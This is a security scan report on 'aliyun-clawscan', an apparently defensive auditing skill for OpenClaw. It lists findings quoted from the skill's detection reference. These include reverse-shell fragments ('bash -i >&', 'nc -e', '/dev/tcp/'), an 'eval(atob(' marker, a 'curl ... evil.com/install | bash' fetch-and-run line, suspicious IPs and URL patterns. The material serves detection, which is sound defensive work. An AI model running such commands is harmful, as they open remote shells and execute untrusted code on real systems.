中文 EN

Scan Report

Scan New Files

Trusted — Risk Score 5/100
Last scan:1 day ago Rescan
5 /100
aliyun-clawscan
Security posture analyzer for OpenClaw environment and installed skills
This is a legitimate defensive security audit tool (aliyun-clawscan) that documents detection patterns for identifying malicious behavior in OTHER skills. The flagged IOCs are documented examples of attack signatures, not actual malicious code.
Skill Namealiyun-clawscan
Duration38.2s
Enginepi
Safe to install
This skill is safe to use. It provides valuable security auditing capabilities by documenting and detecting threat patterns in other skills.
ResourceDeclaredInferredStatusEvidence
Filesystem READ READ ✓ Aligned SKILL.md: Runs 'openclaw security audit --deep' and 'openclaw skills list'
Shell READ READ ✓ Aligned SKILL.md: Runs 'openclaw' CLI commands only
7 Critical 2 High 18 findings
💀
Critical Dangerous Command 危险 Shell 命令
/dev/tcp/
reference/skillaudit.md:32
💀
Critical Dangerous Command 危险 Shell 命令
bash -i >&
reference/skillaudit.md:43
💀
Critical Dangerous Command 危险 Shell 命令
nc -e
reference/skillaudit.md:46
💀
Critical Dangerous Command 危险 Shell 命令
python -c 'import socket
reference/skillaudit.md:49
🔒
Critical Encoded Execution Base64 编码执行(代码混淆)
eval(atob(
reference/skillaudit.md:265
💀
Critical Dangerous Command 危险 Shell 命令
curl | bash
reference/skillaudit.md:392
💀
Critical Dangerous Command 危险 Shell 命令
curl -sL https://evil.com/install | bash
reference/skillaudit.md:527
📡
High IP Address 硬编码 IP 地址
1.2.3.4
reference/skillaudit.md:46
📡
High IP Address 硬编码 IP 地址
91.92.242.30
reference/skillaudit.md:393
🔗
Medium External URL 外部 URL
http://\d+\.\d+\.\d+\.\d+/
reference/skillaudit.md:421
🔗
Medium External URL 外部 URL
http://91\.92\.242\.30/
reference/skillaudit.md:422
🔗
Medium External URL 外部 URL
http://.*\.onion/
reference/skillaudit.md:423
🔗
Medium External URL 外部 URL
https://.*\.xyz/download
reference/skillaudit.md:424
🔗
Medium External URL 外部 URL
https://.*\.top/install
reference/skillaudit.md:425
🔗
Medium External URL 外部 URL
http://91.92.242.30/q0c7ew2ro8l2cfqp
reference/skillaudit.md:453
🔗
Medium External URL 外部 URL
http://\d+\.\d+\.\d+\.\d+
reference/skillaudit.md:483
🔗
Medium External URL 外部 URL
https://evil.com/install
reference/skillaudit.md:527
🔗
Medium External URL 外部 URL
http://1.2.3.4/payload
reference/skillaudit.md:529

File Tree

4 files · 23.0 KB · 873 lines
Markdown 3f · 853L Text 1f · 20L
├─ 📁 reference
│ ├─ 📝 baseline.md Markdown 107L · 2.5 KB
│ └─ 📝 skillaudit.md Markdown 571L · 13.5 KB
├─ 📄 LICENSE.txt Text 20L · 1.1 KB
└─ 📝 SKILL.md Markdown 175L · 6.0 KB

Security Positives

✓ Defensive security tool designed to protect users from malicious skills
✓ Comprehensive detection patterns covering 11 threat categories documented
✓ All IOCs are reference patterns for identifying attacks, not actual malicious code
✓ No executable scripts present - only documentation and detection rules
✓ Safety guardrails documented (static analysis only, no execution of suspicious code)
✓ Evidence-based reporting with file:line references required
✓ Clearly branded as Alibaba Cloud security capability